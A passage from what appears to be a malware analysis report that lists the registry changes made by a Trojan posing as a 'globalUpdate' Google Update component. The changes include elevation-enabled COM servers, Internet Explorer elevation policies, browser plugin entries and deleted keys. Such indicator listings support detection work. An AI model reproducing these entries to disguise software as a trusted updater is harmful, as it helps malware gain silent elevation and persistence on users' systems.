"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"
[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 1C BB 6D 1B 3E 23 5B CA 34 A3 A7 1F 07 11 88"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"
[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"
[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"
[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:1272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"
[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1456422024"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"
